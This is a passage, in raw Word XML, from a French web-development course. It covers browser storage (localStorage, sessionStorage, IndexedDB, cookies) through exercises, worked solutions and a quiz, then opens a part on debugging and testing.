              </w:rPr>
              <w:t>Thème choisi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>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3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Préférence fonctionnelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Panier d'achat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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35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Nécessaire au service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mesure d'audience anonyme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Selon le régime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Souvent exemptée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Publicité ciblée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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35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Traceur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Profil comportemental</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>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3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Traceur</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TROIS RÈGLES DE PERSISTANCE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Stocker le moins possible, le moins longtemps possible.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Valider toute valeur relue, comme une entrée utilisateur.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Prévoir la suppression : un bouton « effacer mes données ».</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localStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est synchrone, limité et ne stocke que des chaînes.</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sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> disparaît à la fermeture de l'onglet.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IndexedDB gère de gros volumes d'objets structurés.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cookie est renvoyé au serveur à chaque requête.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données relues doivent être validées et versionnées.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L'URL est un bon emplacement pour un état partageable.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L'événement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> synchronise les onglets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cours a couvert le langage et l'interaction. La dernière partie traite de la qualité : déboguer, mesurer et publier.</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31.1 — Persister un thème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Le thème choisi doit survivre au rechargement et se synchroniser entre onglets.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Lisez la préférence au démarrage.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Écrivez-la au changement.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 xml:space="preserve">Écoutez l'événement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 31.2 — Centraliser l'état d'une liste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La recherche, le filtre et la pagination sont dispersés dans le DOM.</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Définissez un objet d'état.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Écrivez une fonction de rendu unique.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Synchronisez l'URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 31.3 — Repérer une fuite de stockage</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Le stockage se remplit après quelques jours d'utilisation.</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Listez les clés écrites.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Identifiez celles qui ne sont jamais supprimées.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Ajoutez une purge et une limite.</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31.1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const CLE = "theme";</w:t>
        <w:br/>
        <w:t>const VALEURS = ["clair", "sombre", "auto"];</w:t>
        <w:br/>
        <w:br/>
        <w:t>function appliquer(valeur) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const theme = VALEURS.includes(valeur) ? valeur : "auto";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  document.documentElement.dataset.theme = theme;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return theme;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>appliquer(localStorage.getItem(CLE));</w:t>
        <w:br/>
        <w:br/>
        <w:t>selecteur.addEventListener("change", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  localStorage.setItem(CLE, selecteur.value);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  appliquer(selecteur.value);</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>window.addEventListener("storage", e =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (e.key === CLE) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    selecteur.value = appliquer(e.newValue);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La liste blanche empêche une valeur corrompue de casser le rendu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'écouteur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne se déclenche pas dans l'onglet qui écrit : pas de boucle infinie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 31.2</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const etat = { recherche: "", theme: "tous", page: 1 };</w:t>
        <w:br/>
        <w:br/>
        <w:t>function rendre() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const params = new URLSearchParams(etat);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  history.replaceState(null, "", `?${params}`);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const visibles = filtrer(articles, etat);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  liste.replaceChildren(...visibles.map(carte));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  compteur.textContent = `${visibles.length} résultat(s)`;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>champ.addEventListener("input", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  etat.recherche = champ.value;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  etat.page = 1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  rendre();</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>history.replaceState</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> met l'URL à jour sans ajouter d'entrée à l'historique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le rendu lit toujours l'état : aucune donnée n'est dupliquée dans des attributs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 31.3</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function purger(prefixe, joursMax) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const limite = Date.now() - joursMax * 86400000;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  for (let i = 0; i &lt; localStorage.length; i += 1) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const cle = localStorage.key(i);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (!cle.startsWith(prefixe)) continue;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const { date } = JSON.parse(localStorage.getItem(cle));</w:t>
        <w:br/>
        <w:t xml:space="preserve">      if (!date || date &lt; limite) localStorage.removeItem(cle);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    } catch {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      localStorage.removeItem(cle);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque entrée porte une date d'écriture, ce qui permet une purge par ancienneté.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les entrées illisibles sont supprimées : elles ne servent plus à rien et occupent le quota.</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Quelle API stocke des objets structurés en grande quantité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localStorage</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sessionStorage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IndexedDB</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Cookie</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 xml:space="preserve">Que stocke </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localStorage</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Des objets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Des chaînes uniquement</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Des fichiers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Des fonctions</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 xml:space="preserve">Quand </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est-il vidé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À chaque rechargement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À la fermeture de l'onglet</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Jamais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Toutes les heures</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Quel événement signale une modification depuis un autre onglet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change</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storage</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input</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message</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Pourquoi valider une valeur relue du stockage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Pour accélérer</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Parce qu'elle peut être corrompue ou modifiée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Pour économiser l'espace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Ce n'est pas nécessaire</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> IndexedDB accepte des objets et des fichiers, avec une capacité bien supérieure.</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Toute valeur est convertie en chaîne : il faut sérialiser les objets.</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Les données survivent au rechargement mais pas à la fermeture de l'onglet.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se déclenche dans les autres onglets de la même origine.</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Le stockage local est accessible et modifiable par l'utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId53"/>
          <w:footerReference w:type="default" r:id="rId54"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE V</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Qualité, performance et mise en production</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>Déboguer, mesurer, sécuriser, versionner et publier un site professionnel, puis le maintenir dans le temps.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1. Déboguer et tester · 2. Performance web · 3. Sécurité côté client · 4. Versionner, construire et outiller son projet · 5. Projet final : d'un dossier vide à un site en ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>32. Déboguer et tester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Trouver la cause d'un défaut au lieu de deviner, puis empêcher son retour par des tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 31</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Utiliser méthodiquement les outils de développement.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Poser un point d'arrêt et inspecter l'état d'exécution.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Lire une trace d'appels et interpréter les messages d'erreur.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Écrire des tests unitaires et des tests de composant.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Choisir ce qui mérite d'être testé.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>32.1 Une méthode, pas de l'intuition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Déboguer consiste à réduire l'écart entre ce que le code fait et ce que l'on croit qu'il fait. La démarche est toujours la même : reproduire, isoler, comprendre, corriger, vérifier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3111500"/>
            <wp:docPr id="42" name="Picture 42"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f40.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3111500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.40 — Les cinq étapes du débogage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.99 — Cinq étapes et leurs outils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29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Étape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="366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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2292"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Reproduire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3667"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dans quelles conditions ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
